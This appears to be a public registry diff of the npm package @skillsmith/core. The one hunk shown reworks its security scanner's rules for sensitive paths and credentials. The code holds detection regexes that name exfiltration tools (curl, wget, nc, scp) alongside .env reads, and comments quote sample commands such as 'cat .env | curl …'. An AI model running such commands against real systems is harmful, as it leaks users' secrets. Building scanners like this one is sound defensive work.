@skillsmith/core 0.8.2 → 0.10.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +17 -0
- package/dist/.tsbuildinfo +1 -1
- package/dist/src/api/client.d.ts.map +1 -1
- package/dist/src/api/client.js +6 -0
- package/dist/src/api/client.js.map +1 -1
- package/dist/src/api/client.test.d.ts +9 -0
- package/dist/src/api/client.test.d.ts.map +1 -0
- package/dist/src/api/client.test.js +81 -0
- package/dist/src/api/client.test.js.map +1 -0
- package/dist/src/config/device-identity.d.ts +113 -0
- package/dist/src/config/device-identity.d.ts.map +1 -0
- package/dist/src/config/device-identity.js +171 -0
- package/dist/src/config/device-identity.js.map +1 -0
- package/dist/src/config/device-identity.test.d.ts +10 -0
- package/dist/src/config/device-identity.test.d.ts.map +1 -0
- package/dist/src/config/device-identity.test.js +213 -0
- package/dist/src/config/device-identity.test.js.map +1 -0
- package/dist/src/config/index.d.ts +9 -0
- package/dist/src/config/index.d.ts.map +1 -1
- package/dist/src/config/index.js.map +1 -1
- package/dist/src/exports/services.d.ts +3 -1
- package/dist/src/exports/services.d.ts.map +1 -1
- package/dist/src/exports/services.js +11 -1
- package/dist/src/exports/services.js.map +1 -1
- package/dist/src/index.d.ts +4 -3
- package/dist/src/index.d.ts.map +1 -1
- package/dist/src/index.js +7 -2
- package/dist/src/index.js.map +1 -1
- package/dist/src/install/agent-config-merge.json-array.d.ts +29 -0
- package/dist/src/install/agent-config-merge.json-array.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.json-array.js +100 -0
- package/dist/src/install/agent-config-merge.json-array.js.map +1 -0
- package/dist/src/install/agent-config-merge.json.d.ts +37 -0
- package/dist/src/install/agent-config-merge.json.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.json.js +134 -0
- package/dist/src/install/agent-config-merge.json.js.map +1 -0
- package/dist/src/install/agent-config-merge.toml-block.d.ts +48 -0
- package/dist/src/install/agent-config-merge.toml-block.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.toml-block.js +107 -0
- package/dist/src/install/agent-config-merge.toml-block.js.map +1 -0
- package/dist/src/install/agent-config-merge.types.d.ts +87 -0
- package/dist/src/install/agent-config-merge.types.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.types.js +83 -0
- package/dist/src/install/agent-config-merge.types.js.map +1 -0
- package/dist/src/install/agent-config-merge.yaml.d.ts +46 -0
- package/dist/src/install/agent-config-merge.yaml.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.yaml.js +133 -0
- package/dist/src/install/agent-config-merge.yaml.js.map +1 -0
- package/dist/src/install/agent-config-merge.yaml.test.d.ts +2 -0
- package/dist/src/install/agent-config-merge.yaml.test.d.ts.map +1 -0
- package/dist/src/install/agent-config-merge.yaml.test.js +210 -0
- package/dist/src/install/agent-config-merge.yaml.test.js.map +1 -0
- package/dist/src/install/agent-harness-targets.d.ts +98 -0
- package/dist/src/install/agent-harness-targets.d.ts.map +1 -0
- package/dist/src/install/agent-harness-targets.js +154 -0
- package/dist/src/install/agent-harness-targets.js.map +1 -0
- package/dist/src/install/agent-home-relocate.d.ts +29 -0
- package/dist/src/install/agent-home-relocate.d.ts.map +1 -0
- package/dist/src/install/agent-home-relocate.js +38 -0
- package/dist/src/install/agent-home-relocate.js.map +1 -0
- package/dist/src/install/agent-manifest-path-guard.d.ts +55 -0
- package/dist/src/install/agent-manifest-path-guard.d.ts.map +1 -0
- package/dist/src/install/agent-manifest-path-guard.js +109 -0
- package/dist/src/install/agent-manifest-path-guard.js.map +1 -0
- package/dist/src/install/agent-manifest-path-guard.test.d.ts +2 -0
- package/dist/src/install/agent-manifest-path-guard.test.d.ts.map +1 -0
- package/dist/src/install/agent-manifest-path-guard.test.js +72 -0
- package/dist/src/install/agent-manifest-path-guard.test.js.map +1 -0
- package/dist/src/install/agent-manifest.d.ts +58 -0
- package/dist/src/install/agent-manifest.d.ts.map +1 -0
- package/dist/src/install/agent-manifest.js +103 -0
- package/dist/src/install/agent-manifest.js.map +1 -0
- package/dist/src/install/agent-pack-installer.d.ts +39 -0
- package/dist/src/install/agent-pack-installer.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.entry.d.ts +55 -0
- package/dist/src/install/agent-pack-installer.entry.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.entry.js +90 -0
- package/dist/src/install/agent-pack-installer.entry.js.map +1 -0
- package/dist/src/install/agent-pack-installer.fs-helpers.d.ts +33 -0
- package/dist/src/install/agent-pack-installer.fs-helpers.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.fs-helpers.js +59 -0
- package/dist/src/install/agent-pack-installer.fs-helpers.js.map +1 -0
- package/dist/src/install/agent-pack-installer.harness.d.ts +66 -0
- package/dist/src/install/agent-pack-installer.harness.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.harness.js +310 -0
- package/dist/src/install/agent-pack-installer.harness.js.map +1 -0
- package/dist/src/install/agent-pack-installer.js +221 -0
- package/dist/src/install/agent-pack-installer.js.map +1 -0
- package/dist/src/install/agent-pack-installer.preserve.test.d.ts +11 -0
- package/dist/src/install/agent-pack-installer.preserve.test.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.preserve.test.js +72 -0
- package/dist/src/install/agent-pack-installer.preserve.test.js.map +1 -0
- package/dist/src/install/agent-pack-installer.test.d.ts +2 -0
- package/dist/src/install/agent-pack-installer.test.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.test.js +350 -0
- package/dist/src/install/agent-pack-installer.test.js.map +1 -0
- package/dist/src/install/agent-pack-installer.types.d.ts +51 -0
- package/dist/src/install/agent-pack-installer.types.d.ts.map +1 -0
- package/dist/src/install/agent-pack-installer.types.js +16 -0
- package/dist/src/install/agent-pack-installer.types.js.map +1 -0
- package/dist/src/install/agent-pack-uninstaller.d.ts +43 -0
- package/dist/src/install/agent-pack-uninstaller.d.ts.map +1 -0
- package/dist/src/install/agent-pack-uninstaller.js +113 -0
- package/dist/src/install/agent-pack-uninstaller.js.map +1 -0
- package/dist/src/install/agent-pack-uninstaller.test.d.ts +2 -0
- package/dist/src/install/agent-pack-uninstaller.test.d.ts.map +1 -0
- package/dist/src/install/agent-pack-uninstaller.test.js +212 -0
- package/dist/src/install/agent-pack-uninstaller.test.js.map +1 -0
- package/dist/src/install/index.d.ts +8 -1
- package/dist/src/install/index.d.ts.map +1 -1
- package/dist/src/install/index.js +8 -1
- package/dist/src/install/index.js.map +1 -1
- package/dist/src/install/paths.d.ts +17 -1
- package/dist/src/install/paths.d.ts.map +1 -1
- package/dist/src/install/paths.js +26 -0
- package/dist/src/install/paths.js.map +1 -1
- package/dist/src/install/paths.test.d.ts +2 -0
- package/dist/src/install/paths.test.d.ts.map +1 -0
- package/dist/src/install/paths.test.js +76 -0
- package/dist/src/install/paths.test.js.map +1 -0
- package/dist/src/journal/hash.d.ts +13 -0
- package/dist/src/journal/hash.d.ts.map +1 -0
- package/dist/src/journal/hash.js +16 -0
- package/dist/src/journal/hash.js.map +1 -0
- package/dist/src/journal/index.d.ts +15 -0
- package/dist/src/journal/index.d.ts.map +1 -0
- package/dist/src/journal/index.js +15 -0
- package/dist/src/journal/index.js.map +1 -0
- package/dist/src/journal/journal.test.d.ts +16 -0
- package/dist/src/journal/journal.test.d.ts.map +1 -0
- package/dist/src/journal/journal.test.js +171 -0
- package/dist/src/journal/journal.test.js.map +1 -0
- package/dist/src/journal/path.d.ts +44 -0
- package/dist/src/journal/path.d.ts.map +1 -0
- package/dist/src/journal/path.js +61 -0
- package/dist/src/journal/path.js.map +1 -0
- package/dist/src/journal/reader.d.ts +38 -0
- package/dist/src/journal/reader.d.ts.map +1 -0
- package/dist/src/journal/reader.js +93 -0
- package/dist/src/journal/reader.js.map +1 -0
- package/dist/src/journal/types.d.ts +87 -0
- package/dist/src/journal/types.d.ts.map +1 -0
- package/dist/src/journal/types.js +21 -0
- package/dist/src/journal/types.js.map +1 -0
- package/dist/src/journal/writer.d.ts +52 -0
- package/dist/src/journal/writer.d.ts.map +1 -0
- package/dist/src/journal/writer.js +125 -0
- package/dist/src/journal/writer.js.map +1 -0
- package/dist/src/paywall-triggers/index.d.ts +13 -0
- package/dist/src/paywall-triggers/index.d.ts.map +1 -0
- package/dist/src/paywall-triggers/index.js +13 -0
- package/dist/src/paywall-triggers/index.js.map +1 -0
- package/dist/src/paywall-triggers/path.d.ts +47 -0
- package/dist/src/paywall-triggers/path.d.ts.map +1 -0
- package/dist/src/paywall-triggers/path.js +73 -0
- package/dist/src/paywall-triggers/path.js.map +1 -0
- package/dist/src/paywall-triggers/store.d.ts +75 -0
- package/dist/src/paywall-triggers/store.d.ts.map +1 -0
- package/dist/src/paywall-triggers/store.js +122 -0
- package/dist/src/paywall-triggers/store.js.map +1 -0
- package/dist/src/paywall-triggers/store.test.d.ts +2 -0
- package/dist/src/paywall-triggers/store.test.d.ts.map +1 -0
- package/dist/src/paywall-triggers/store.test.js +121 -0
- package/dist/src/paywall-triggers/store.test.js.map +1 -0
- package/dist/src/paywall-triggers/types.d.ts +24 -0
- package/dist/src/paywall-triggers/types.d.ts.map +1 -0
- package/dist/src/paywall-triggers/types.js +13 -0
- package/dist/src/paywall-triggers/types.js.map +1 -0
- package/dist/src/security/scanner/SecurityScanner.compound.d.ts +13 -0
- package/dist/src/security/scanner/SecurityScanner.compound.d.ts.map +1 -0
- package/dist/src/security/scanner/SecurityScanner.compound.js +127 -0
- package/dist/src/security/scanner/SecurityScanner.compound.js.map +1 -0
- package/dist/src/security/scanner/SecurityScanner.d.ts.map +1 -1
- package/dist/src/security/scanner/SecurityScanner.js +10 -1
- package/dist/src/security/scanner/SecurityScanner.js.map +1 -1
- package/dist/src/security/scanner/SecurityScanner.pii.d.ts +23 -0
- package/dist/src/security/scanner/SecurityScanner.pii.d.ts.map +1 -0
- package/dist/src/security/scanner/SecurityScanner.pii.js +152 -0
- package/dist/src/security/scanner/SecurityScanner.pii.js.map +1 -0
- package/dist/src/security/scanner/SecurityScanner.scanners.d.ts +5 -2
- package/dist/src/security/scanner/SecurityScanner.scanners.d.ts.map +1 -1
- package/dist/src/security/scanner/SecurityScanner.scanners.js +63 -70
- package/dist/src/security/scanner/SecurityScanner.scanners.js.map +1 -1
- package/dist/src/security/scanner/patterns.d.ts +2 -0
- package/dist/src/security/scanner/patterns.d.ts.map +1 -1
- package/dist/src/security/scanner/patterns.js +79 -11
- package/dist/src/security/scanner/patterns.js.map +1 -1
- package/dist/src/security/scanner/types.d.ts +2 -0
- package/dist/src/security/scanner/types.d.ts.map +1 -1
- package/dist/src/services/agent-pack/agent-pack.test.d.ts +18 -0
- package/dist/src/services/agent-pack/agent-pack.test.d.ts.map +1 -0
- package/dist/src/services/agent-pack/agent-pack.test.js +344 -0
- package/dist/src/services/agent-pack/agent-pack.test.js.map +1 -0
- package/dist/src/services/agent-pack/hooks.d.ts +29 -0
- package/dist/src/services/agent-pack/hooks.d.ts.map +1 -0
- package/dist/src/services/agent-pack/hooks.js +139 -0
- package/dist/src/services/agent-pack/hooks.js.map +1 -0
- package/dist/src/services/agent-pack/index.d.ts +26 -0
- package/dist/src/services/agent-pack/index.d.ts.map +1 -0
- package/dist/src/services/agent-pack/index.js +109 -0
- package/dist/src/services/agent-pack/index.js.map +1 -0
- package/dist/src/services/agent-pack/prompt-source.d.ts +47 -0
- package/dist/src/services/agent-pack/prompt-source.d.ts.map +1 -0
- package/dist/src/services/agent-pack/prompt-source.js +182 -0
- package/dist/src/services/agent-pack/prompt-source.js.map +1 -0
- package/dist/src/services/agent-pack/shims.d.ts +40 -0
- package/dist/src/services/agent-pack/shims.d.ts.map +1 -0
- package/dist/src/services/agent-pack/shims.js +96 -0
- package/dist/src/services/agent-pack/shims.js.map +1 -0
- package/dist/src/services/agent-pack/skill-md.d.ts +35 -0
- package/dist/src/services/agent-pack/skill-md.d.ts.map +1 -0
- package/dist/src/services/agent-pack/skill-md.js +89 -0
- package/dist/src/services/agent-pack/skill-md.js.map +1 -0
- package/dist/src/services/agent-pack/types.d.ts +118 -0
- package/dist/src/services/agent-pack/types.d.ts.map +1 -0
- package/dist/src/services/agent-pack/types.js +61 -0
- package/dist/src/services/agent-pack/types.js.map +1 -0
- package/dist/src/services/agent-tool-profile.d.ts +59 -0
- package/dist/src/services/agent-tool-profile.d.ts.map +1 -0
- package/dist/src/services/agent-tool-profile.js +76 -0
- package/dist/src/services/agent-tool-profile.js.map +1 -0
- package/dist/src/services/agent-tool-profile.test.d.ts +2 -0
- package/dist/src/services/agent-tool-profile.test.d.ts.map +1 -0
- package/dist/src/services/agent-tool-profile.test.js +28 -0
- package/dist/src/services/agent-tool-profile.test.js.map +1 -0
- package/dist/src/services/bundled-sibling-scan.d.ts +111 -0
- package/dist/src/services/bundled-sibling-scan.d.ts.map +1 -0
- package/dist/src/services/bundled-sibling-scan.js +170 -0
- package/dist/src/services/bundled-sibling-scan.js.map +1 -0
- package/dist/src/services/skill-installation.io.d.ts +16 -5
- package/dist/src/services/skill-installation.io.d.ts.map +1 -1
- package/dist/src/services/skill-installation.io.js +44 -20
- package/dist/src/services/skill-installation.io.js.map +1 -1
- package/dist/src/services/skill-installation.policy.d.ts +96 -0
- package/dist/src/services/skill-installation.policy.d.ts.map +1 -0
- package/dist/src/services/skill-installation.policy.js +144 -0
- package/dist/src/services/skill-installation.policy.js.map +1 -0
- package/dist/src/services/skill-installation.service.d.ts.map +1 -1
- package/dist/src/services/skill-installation.service.js +9 -3
- package/dist/src/services/skill-installation.service.js.map +1 -1
- package/dist/src/sources/index.d.ts +1 -0
- package/dist/src/sources/index.d.ts.map +1 -1
- package/dist/src/sources/index.js +4 -0
- package/dist/src/sources/index.js.map +1 -1
- package/dist/src/sync/index.d.ts +6 -0
- package/dist/src/sync/index.d.ts.map +1 -1
- package/dist/src/sync/index.js +8 -0
- package/dist/src/sync/index.js.map +1 -1
- package/dist/src/sync/inventory-builder.d.ts +21 -0
- package/dist/src/sync/inventory-builder.d.ts.map +1 -0
- package/dist/src/sync/inventory-builder.js +26 -0
- package/dist/src/sync/inventory-builder.js.map +1 -0
- package/dist/src/sync/inventory-client.d.ts +80 -0
- package/dist/src/sync/inventory-client.d.ts.map +1 -0
- package/dist/src/sync/inventory-client.js +204 -0
- package/dist/src/sync/inventory-client.js.map +1 -0
- package/dist/src/sync/inventory-client.test.d.ts +14 -0
- package/dist/src/sync/inventory-client.test.d.ts.map +1 -0
- package/dist/src/sync/inventory-client.test.js +212 -0
- package/dist/src/sync/inventory-client.test.js.map +1 -0
- package/dist/src/sync/inventory-collector.d.ts +35 -0
- package/dist/src/sync/inventory-collector.d.ts.map +1 -0
- package/dist/src/sync/inventory-collector.js +176 -0
- package/dist/src/sync/inventory-collector.js.map +1 -0
- package/dist/src/sync/inventory-collector.test.d.ts +14 -0
- package/dist/src/sync/inventory-collector.test.d.ts.map +1 -0
- package/dist/src/sync/inventory-collector.test.js +156 -0
- package/dist/src/sync/inventory-collector.test.js.map +1 -0
- package/dist/src/sync/inventory-device.d.ts +36 -0
- package/dist/src/sync/inventory-device.d.ts.map +1 -0
- package/dist/src/sync/inventory-device.js +58 -0
- package/dist/src/sync/inventory-device.js.map +1 -0
- package/dist/src/sync/inventory-push.d.ts +45 -0
- package/dist/src/sync/inventory-push.d.ts.map +1 -0
- package/dist/src/sync/inventory-push.js +62 -0
- package/dist/src/sync/inventory-push.js.map +1 -0
- package/dist/src/sync/inventory-push.test.d.ts +16 -0
- package/dist/src/sync/inventory-push.test.d.ts.map +1 -0
- package/dist/src/sync/inventory-push.test.js +104 -0
- package/dist/src/sync/inventory-push.test.js.map +1 -0
- package/dist/src/sync/inventory-types.d.ts +110 -0
- package/dist/src/sync/inventory-types.d.ts.map +1 -0
- package/dist/src/sync/inventory-types.js +45 -0
- package/dist/src/sync/inventory-types.js.map +1 -0
- package/dist/src/telemetry/agent-marker.d.ts +137 -0
- package/dist/src/telemetry/agent-marker.d.ts.map +1 -0
- package/dist/src/telemetry/agent-marker.js +242 -0
- package/dist/src/telemetry/agent-marker.js.map +1 -0
- package/dist/src/telemetry/agent-marker.test.d.ts +13 -0
- package/dist/src/telemetry/agent-marker.test.d.ts.map +1 -0
- package/dist/src/telemetry/agent-marker.test.js +202 -0
- package/dist/src/telemetry/agent-marker.test.js.map +1 -0
- package/dist/src/telemetry/index.d.ts +2 -1
- package/dist/src/telemetry/index.d.ts.map +1 -1
- package/dist/src/telemetry/index.js +6 -1
- package/dist/src/telemetry/index.js.map +1 -1
- package/dist/src/telemetry/posthog.d.ts +10 -0
- package/dist/src/telemetry/posthog.d.ts.map +1 -1
- package/dist/src/telemetry/posthog.js +5 -1
- package/dist/src/telemetry/posthog.js.map +1 -1
- package/dist/src/telemetry/wrap.d.ts +28 -7
- package/dist/src/telemetry/wrap.d.ts.map +1 -1
- package/dist/src/telemetry/wrap.gate.test.d.ts +22 -0
- package/dist/src/telemetry/wrap.gate.test.d.ts.map +1 -0
- package/dist/src/telemetry/wrap.gate.test.js +197 -0
- package/dist/src/telemetry/wrap.gate.test.js.map +1 -0
- package/dist/src/telemetry/wrap.js +111 -26
- package/dist/src/telemetry/wrap.js.map +1 -1
- package/dist/src/telemetry/wrap.marker.test.d.ts +16 -0
- package/dist/src/telemetry/wrap.marker.test.d.ts.map +1 -0
- package/dist/src/telemetry/wrap.marker.test.js +185 -0
- package/dist/src/telemetry/wrap.marker.test.js.map +1 -0
- package/dist/src/telemetry/wrap.test.js +4 -0
- package/dist/src/telemetry/wrap.test.js.map +1 -1
- package/dist/tests/SecurityScanner.exec.test.js +60 -0
- package/dist/tests/SecurityScanner.exec.test.js.map +1 -1
- package/dist/tests/security/ContinuousSecurity.test.js +10 -4
- package/dist/tests/security/ContinuousSecurity.test.js.map +1 -1
- package/dist/tests/security/SecurityScanner.chmod-evasion.test.d.ts +2 -0
- package/dist/tests/security/SecurityScanner.chmod-evasion.test.d.ts.map +1 -0
- package/dist/tests/security/SecurityScanner.chmod-evasion.test.js +126 -0
- package/dist/tests/security/SecurityScanner.chmod-evasion.test.js.map +1 -0
- package/dist/tests/security/chmod-compound.test.d.ts +2 -0
- package/dist/tests/security/chmod-compound.test.d.ts.map +1 -0
- package/dist/tests/security/chmod-compound.test.js +188 -0
- package/dist/tests/security/chmod-compound.test.js.map +1 -0
- package/dist/tests/security/pii-detection.test.js +131 -0
- package/dist/tests/security/pii-detection.test.js.map +1 -1
- package/dist/tests/security/scanner-regression-guard.test.d.ts +23 -7
- package/dist/tests/security/scanner-regression-guard.test.d.ts.map +1 -1
- package/dist/tests/security/scanner-regression-guard.test.js +27 -11
- package/dist/tests/security/scanner-regression-guard.test.js.map +1 -1
- package/dist/tests/security/sensitive-path-fp.test.d.ts +2 -0
- package/dist/tests/security/sensitive-path-fp.test.d.ts.map +1 -0
- package/dist/tests/security/sensitive-path-fp.test.js +142 -0
- package/dist/tests/security/sensitive-path-fp.test.js.map +1 -0
- package/dist/tests/services/bundled-sibling-scan.test.d.ts +2 -0
- package/dist/tests/services/bundled-sibling-scan.test.d.ts.map +1 -0
- package/dist/tests/services/bundled-sibling-scan.test.js +139 -0
- package/dist/tests/services/bundled-sibling-scan.test.js.map +1 -0
- package/dist/tests/unit/services/skill-installation.io.test.js +166 -0
- package/dist/tests/unit/services/skill-installation.io.test.js.map +1 -1
- package/dist/tests/unit/services/skill-installation.policy.test.d.ts +8 -0
- package/dist/tests/unit/services/skill-installation.policy.test.d.ts.map +1 -0
- package/dist/tests/unit/services/skill-installation.policy.test.js +151 -0
- package/dist/tests/unit/services/skill-installation.policy.test.js.map +1 -0
- package/package.json +23 -3
|
@@ -10,9 +10,28 @@
|
|
|
10
10
|
* them out is behaviour-preserving (guarded by the scoring + regression-guard
|
|
11
11
|
* + ai-defence test suites).
|
|
12
12
|
*/
|
|
13
|
-
import { SENSITIVE_PATH_PATTERNS, SOCIAL_ENGINEERING_PATTERNS, PROMPT_LEAKING_PATTERNS, DATA_EXFILTRATION_PATTERNS, PRIVILEGE_ESCALATION_PATTERNS,
|
|
13
|
+
import { SENSITIVE_PATH_PATTERNS, ENV_PATH_PATTERN, VALUE_GATED_KEYWORD_PATTERNS, SOCIAL_ENGINEERING_PATTERNS, PROMPT_LEAKING_PATTERNS, DATA_EXFILTRATION_PATTERNS, PRIVILEGE_ESCALATION_PATTERNS, } from './patterns.js';
|
|
14
14
|
import { safeRegexTest, safeRegexCheck } from './regex-utils.js';
|
|
15
15
|
import { analyzeMarkdownContext, isDocumentationContext, isWithinInlineCode, } from './SecurityScanner.helpers.js';
|
|
16
|
+
import { looksLikePlaceholderSecret, shannonEntropy, scanPiiPatterns, } from './SecurityScanner.pii.js';
|
|
17
|
+
/**
|
|
18
|
+
* SMI-5359 Wave 4 (MF-2): a `.env` reference is an active read/exfiltration only when
|
|
19
|
+
* it co-occurs with a read/copy/transfer verb or a shell pipe/redirect on the same line
|
|
20
|
+
* (`cat .env | curl …`, `cp .env /tmp`, `source .env`). A lone reference
|
|
21
|
+
* (`see the .env file`) stays MEDIUM so it can't single-handedly trip the Gate-A
|
|
22
|
+
* high/critical short-circuit. Bounded alternation + single-char class → ReDoS-safe.
|
|
23
|
+
*/
|
|
24
|
+
const ENV_EXFIL_CONTEXT = /\b(?:cat|cp|mv|scp|rsync|source|curl|wget|fetch|less|more|head|tail|tee|upload|tar|zip|gzip|base64|xxd|dd|nc|netcat)\b|[|>]/i;
|
|
25
|
+
/**
|
|
26
|
+
* SMI-5359 Wave 4 (MF-1): a bare api_key/auth_token keyword is a credential leak only
|
|
27
|
+
* when the line ASSIGNS a value to it. The full match is handed to
|
|
28
|
+
* looksLikePlaceholderSecret, which strips the `<key>=`/`<key>:` prefix and rejects
|
|
29
|
+
* named placeholders, single-repeated-char, and sub-entropy values — so
|
|
30
|
+
* `export API_KEY=$1`, `apiKey: <YOUR_KEY>`, and `auth_token: YOUR_TOKEN_HERE` are
|
|
31
|
+
* suppressed while a real `apiKey = "sk_live_…"` still scores HIGH. Bounded, single
|
|
32
|
+
* `.+` quantifier → ReDoS-safe.
|
|
33
|
+
*/
|
|
34
|
+
const CREDENTIAL_ASSIGNMENT = /(?:api[_-]?key|apikey|auth[_-]?token|authtoken)\s*[:=]\s*.+$/i;
|
|
16
35
|
export function scanSensitivePaths(content, lineContexts) {
|
|
17
36
|
const findings = [];
|
|
18
37
|
const lines = content.split('\n');
|
|
@@ -20,23 +39,46 @@ export function scanSensitivePaths(content, lineContexts) {
|
|
|
20
39
|
lines.forEach((line, index) => {
|
|
21
40
|
const ctx = contexts[index];
|
|
22
41
|
for (const pattern of SENSITIVE_PATH_PATTERNS) {
|
|
23
|
-
if (safeRegexCheck(pattern, line))
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
42
|
+
if (!safeRegexCheck(pattern, line))
|
|
43
|
+
continue;
|
|
44
|
+
const match = safeRegexTest(pattern, line);
|
|
45
|
+
const inInlineCode = ctx?.isInlineCode && isWithinInlineCode(line, match?.index ?? 0);
|
|
46
|
+
const inDocContext = ctx ? isDocumentationContext(ctx) || inInlineCode : false;
|
|
47
|
+
// MF-1: value-gate the bare credential keywords. A bare/placeholder mention is
|
|
48
|
+
// suppressed — keep scanning later patterns rather than emitting. The real-secret
|
|
49
|
+
// leak still surfaces at PII; the `$VAR`-in-curl exfil at DATA_EXFILTRATION.
|
|
50
|
+
if (VALUE_GATED_KEYWORD_PATTERNS.has(pattern)) {
|
|
51
|
+
const assign = safeRegexTest(CREDENTIAL_ASSIGNMENT, line);
|
|
52
|
+
if (!assign || looksLikePlaceholderSecret(assign[0]))
|
|
53
|
+
continue;
|
|
54
|
+
}
|
|
55
|
+
// MF-2: lone `.env` → MEDIUM; `.env` + read/exfil verb or pipe/redirect → HIGH.
|
|
56
|
+
// Doc-context keeps the existing MEDIUM downgrade for every pattern.
|
|
57
|
+
let severity;
|
|
58
|
+
if (inDocContext) {
|
|
59
|
+
severity = 'medium';
|
|
39
60
|
}
|
|
61
|
+
else if (pattern === ENV_PATH_PATTERN) {
|
|
62
|
+
severity = safeRegexCheck(ENV_EXFIL_CONTEXT, line) ? 'high' : 'medium';
|
|
63
|
+
}
|
|
64
|
+
else {
|
|
65
|
+
severity = 'high';
|
|
66
|
+
}
|
|
67
|
+
const confidence = inDocContext
|
|
68
|
+
? 'low'
|
|
69
|
+
: severity === 'high'
|
|
70
|
+
? 'high'
|
|
71
|
+
: 'medium';
|
|
72
|
+
findings.push({
|
|
73
|
+
type: 'sensitive_path',
|
|
74
|
+
severity,
|
|
75
|
+
message: `Reference to potentially sensitive path: ${pattern.source}`,
|
|
76
|
+
location: line.trim().slice(0, 100),
|
|
77
|
+
lineNumber: index + 1,
|
|
78
|
+
inDocumentationContext: inDocContext,
|
|
79
|
+
confidence,
|
|
80
|
+
});
|
|
81
|
+
break;
|
|
40
82
|
}
|
|
41
83
|
});
|
|
42
84
|
return findings;
|
|
@@ -157,57 +199,8 @@ export function scanPrivilegeEscalation(content, lineContexts) {
|
|
|
157
199
|
});
|
|
158
200
|
return findings;
|
|
159
201
|
}
|
|
160
|
-
/**
|
|
161
|
-
export
|
|
162
|
-
|
|
163
|
-
|
|
164
|
-
const contexts = lineContexts ?? analyzeMarkdownContext(content);
|
|
165
|
-
let frontmatterEnd = -1;
|
|
166
|
-
if (lines[0]?.trim() === '---') {
|
|
167
|
-
for (let i = 1; i < lines.length; i++) {
|
|
168
|
-
if (lines[i].trim() === '---') {
|
|
169
|
-
frontmatterEnd = i;
|
|
170
|
-
break;
|
|
171
|
-
}
|
|
172
|
-
}
|
|
173
|
-
}
|
|
174
|
-
const emailPatternIndex = 7;
|
|
175
|
-
lines.forEach((line, index) => {
|
|
176
|
-
const ctx = contexts[index];
|
|
177
|
-
const inFrontmatter = index > 0 && index < frontmatterEnd;
|
|
178
|
-
for (let pi = 0; pi < PII_PATTERNS.length; pi++) {
|
|
179
|
-
const pattern = PII_PATTERNS[pi];
|
|
180
|
-
const match = safeRegexTest(pattern, line);
|
|
181
|
-
if (match) {
|
|
182
|
-
const inInlineCode = ctx?.isInlineCode && isWithinInlineCode(line, match.index ?? 0);
|
|
183
|
-
const inDocContext = ctx ? isDocumentationContext(ctx) || inInlineCode : false;
|
|
184
|
-
const isEmailPattern = pi === emailPatternIndex;
|
|
185
|
-
const isAuthorLine = /^\s*(?:author|contact|support|email)\s*:/i.test(line);
|
|
186
|
-
const inEmailSafeContext = isEmailPattern && (inFrontmatter || isAuthorLine);
|
|
187
|
-
let severity;
|
|
188
|
-
if (inEmailSafeContext)
|
|
189
|
-
severity = 'low';
|
|
190
|
-
else if (inDocContext)
|
|
191
|
-
severity = 'medium';
|
|
192
|
-
else if (pi <= 2 || pi === 9)
|
|
193
|
-
severity = 'critical';
|
|
194
|
-
else
|
|
195
|
-
severity = 'high';
|
|
196
|
-
const confidence = inDocContext || inEmailSafeContext ? 'low' : 'high';
|
|
197
|
-
findings.push({
|
|
198
|
-
type: 'pii',
|
|
199
|
-
severity,
|
|
200
|
-
message: `PII detected: ${match[0].slice(0, 40)}${match[0].length > 40 ? '...' : ''}`,
|
|
201
|
-
location: line.trim().slice(0, 100),
|
|
202
|
-
lineNumber: index + 1,
|
|
203
|
-
category: 'pii',
|
|
204
|
-
inDocumentationContext: inDocContext || inEmailSafeContext,
|
|
205
|
-
confidence,
|
|
206
|
-
});
|
|
207
|
-
break;
|
|
208
|
-
}
|
|
209
|
-
}
|
|
210
|
-
});
|
|
211
|
-
return findings;
|
|
212
|
-
}
|
|
202
|
+
/** Implementation in SecurityScanner.compound.ts (SMI-5434 split). */
|
|
203
|
+
export { scanChmodFetchCompound } from './SecurityScanner.compound.js';
|
|
204
|
+
/** Implementation in SecurityScanner.pii.ts (SMI-5434 split). */
|
|
205
|
+
export { shannonEntropy, looksLikePlaceholderSecret, scanPiiPatterns };
|
|
213
206
|
//# sourceMappingURL=SecurityScanner.scanners.js.map
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"SecurityScanner.scanners.js","sourceRoot":"","sources":["../../../../src/security/scanner/SecurityScanner.scanners.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAGH,OAAO,EACL,uBAAuB,EACvB,2BAA2B,EAC3B,uBAAuB,EACvB,0BAA0B,EAC1B,6BAA6B,
|
|
1
|
+
